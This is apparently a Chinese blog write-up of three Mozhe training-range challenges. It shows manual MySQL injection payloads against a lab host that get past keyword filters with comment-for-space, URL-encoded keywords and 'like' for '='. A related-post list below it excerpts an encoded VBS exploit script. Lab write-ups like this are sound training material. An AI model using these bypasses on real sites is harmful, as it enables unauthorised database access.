墨者-mysql过滤字符后手工注入漏洞测试 题解

最新推荐文章于 2024-07-24 13:35:03 发布
最新推荐文章于 2024-07-24 13:35:03 发布
阅读量1.9k 收藏
点赞数
分类专栏: sql注入 靶场 文章标签: mysql web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Redredredfish/article/details/121957308
版权

靶场地址

第一题:https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

第二题:https://www.mozhe.cn/bug/detail/RkxnbzB6WWpWWjBuTDEyamZXNmJiQT09bW96aGUmozhe

第三题:
https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe

题解

第一题

url:http://219.153.49.228:42443/new_list.php?id=1
id=1',id=2页面变化
id=1 and 1 = 1,id=1 and 1=2页面重定向id=1

id=1%20 ,重定向
id=1/**/,未重定向
说明过滤了空格

id=1/**/and,重定向
对and进行url编码,即id=1/**/%61%6e%64,未重定向且url自动解码
说明会对字母进行url编码,或者会对黑名单函数进行url编码

id=1/**/%61%6e%64/**/1/**/=/**/1,页面正常未重定向
在这里插入图片描述

id=1/**/%61%6e%64/**/1/**/=/**/2,页面重定向
按道理1=1页面正常,说明=没有被过滤,而1=2重定向,这里可能不是单纯的黑名单过滤=,尝试用别的函数代替=,比如like

id=1/**/%61%6e%64/**/1/**/like/**/2
在这里插入图片描述
得到想要的结果,此时like没有url编码,验证了仅对黑名单函数进行url编码

⑤既然完全摸清黑名单比较麻烦,干脆直接全部url编码,之后就是常规的联合查询

第二题

思路和第一题基本一致,黑名单绕过除了完全url编码也可以用部分url编码
例如

select ——>%72elect

第三题

貌似啥也没过滤…
最后爆数据的时候需要注意一下,因为表名是(@dmin9_td4b},用单引号、双引号都会冲突,用反引号即可

Redredredfish
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
墨者学院_CMS系统漏洞分析溯源(第4题)
weixin_50698958的博客
10-10 759
靶场: https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe 背景介绍 ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异的公司企业网站。ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 实训目标 1.学习登录绕过
SQL手工注入漏洞测试—Access数据库(墨者学院靶场)
ISNS的博客
07-09 1477
靶场: https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe 1.点击滚动的通知。 点击后进入页面: 2.判断是否为注入点。 3.判断字段数量。 采用二分法,从10开始查询。结果显示有4个字段: 因为Access用联合语句显示可显字段时,必须要“from 表名”,所以需要先猜表名。 4.猜...
墨者-SQL手工注入漏洞测试MySQL数据库-字符型)题解
Redredredfish的博客
12-08 559
靶场地址:https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe 题解: ①启动靶场,url:http://219.153.49.228:43157/,是一个登录界面,显然需要登录获得key,一开始使用万能密码、抓包都没找到注入点,结果在这个滚动的公告页面,url:http://219.153.49.228:43157/new_list.php?id=tingjigonggao ②进入页面,url中有id=t
漏洞扫描练习题
难办就别办的博客
04-20 1482
B.Microsoft Windows中的Kernel API存在本地信息泄露漏洞,攻击者可借助特制的应用程序利用该漏洞注入跨进程通信,中断系统功能。D.Microsoft Windows中的Device Guard存在安全绕过漏洞,该漏洞源于程序未能正确的验证不可信的文件。A.Microsoft Windows中的Edge存在提权漏洞,该漏洞源于程序没有正确的强制执行跨域策略。题库导出的有点问题,1234选项对应的就是ABCD。题库导出的有点问题,1234选项对应的就是ABCD。
MySQL手工注入(内含实验)
weixin_57959384的博客
03-12 4014
网站的账号和密码在哪里? 数据库里。 数据库中储存着数据表,字段,数据,内容。结构化查询语句(SQL) 什么是SQL注入? SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 实验: 墨者学院,注册,登录。 找到靶场 (实验名称:MySQL手工注入漏洞测试(MySQL数据库)) 一、判断注
墨者_SQL过滤字符手工注入漏洞测试(第3题)
weixin_50698958的博客
10-12 371
靶场: https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习搭建一个采购系统,为了安全起见,“墨者”对该系统做了部分防护措施,请你帮助他测试系统是否安全。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解MySQL的数据结构; 4、了解SQL注入常用注释字符; 5、了解sql注入常用绕过姿势; 解题方向 手工进行SQL注入测试
墨者靶场 初级:SQL过滤字符手工注入漏洞测试
qq_43233085的博客
01-13 412
墨者靶场 初级:SQL过滤字符手工注入漏洞测试题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Apache+PHP+MySQL,PHP代码对客户端提交的参数做了些许过滤。来感受过滤过后的SQL手工注入吧。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解字符串的URL加解密; 4、了解SQL注入...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
mysql 过滤单引号 注入_被过滤了引号的SQL注入如何破?
weixin_39940182的博客
01-19 2477
在去年十月份的时候本菜参加了一场CTF比赛,有一道过滤了单引号的SQL注入当时并没有做出来,让我一直心心念念。今天在做CISCN2019 总决赛 EasyWeb题的时候受到了启发,终于解开了一个心头的包袱。先祭出当时比赛的原题,高手请一笑而过。。...
关于一个sql注入注入题目的思考
一个码农的笔记
02-12 2557
p牛在群里面出了一个好玩的题目,正好晚上空虚寂寞冷,就做一下暖暖身子,题目是:<?php $link = mysqli_connect('localhost', 'root', 'root'); mysqli_select_db($link, 'code');$table = addslashes($_GET['table']); $sql = "UPDATE `{$table}`
VBS.Exploit
纯净的天空
04-16 1247
脚本病毒名: VBS.Exploit======================脚本内容: document.write(unescape("%3c%74%65%78%74%61%72%65%61%20%69%64%3d%22%63%6f%64%65%22%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%22%3e%0d
笔试题————网络安全web安全渗透测试之笔试总结(二)
热门推荐
Fly_鹏程万里
05-13 1万+
主要讲解内容1.什么是WebShell? 2.什么是网络钓鱼? 3.你获取网络安全知识途径有哪些? 4.什么是CC攻击? 5.Web服务器被入侵后,怎样进行排查? 6.dll文件是什么意思,有什么用?DLL劫持原理 7.0day漏洞 8.Rootkit是什么意思 9.蜜罐 10.ssh 11.DDOS 12.震网病毒: 13.一句话木马 14.Https的作用 15.手工查找后门木马的小技巧 16...
史上最全的渗透测试面试题,都是干货。
m0_48368237的博客
01-30 7712
1、拿到一个待检测的站或给你一个网站,你觉得应该先做什么? 一、信息收集 1.获取域名的whois信息,获取注册者邮箱姓名电话等。 2.通过站长之家、明小子、k8等查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。 3、通过DNS域传送漏洞、备份号查询、SSl证书、APP、微信公众号、暴力破解、DNS历史记录、K8 C段查询、Jsfinder、360或华为威胁情报、证书序列号获取企业域名与ip。 4.通过Nmap、Wappalyzer、御剑等查看服务器操作系统
一套实用的***测试岗位面试题,你会吗?
weixin_33827731的博客
04-11 1678
本文内容大部分转载自Mrxn's Blog,仅作少部分修改。1.拿到一个待检测的站,你觉得应该先做什么?收集信息whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说...2.mysql的网站注入,5.0以上和5.0以下有什么区别?5.0以下没有information_schema这个系统表,无法列表名等,只能...
DBeaver Ultimate 22.1.0 连接数据库(MySQL+Mongo+Clickhouse)
最新发布
我不懂,可我不傻
07-24 872
继续书接上文Docker Compose V2 安装常用数据库MySQL+Mongo,部署安装好之后我本来是找了一个web端的在线连接数据库的工具,但是使用过程中并不丝滑,最终还是选择了使用 DBeaver ,然后发现 mongo 还需要许可,又折腾整理了半下午,终于大功告成。
墨者-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值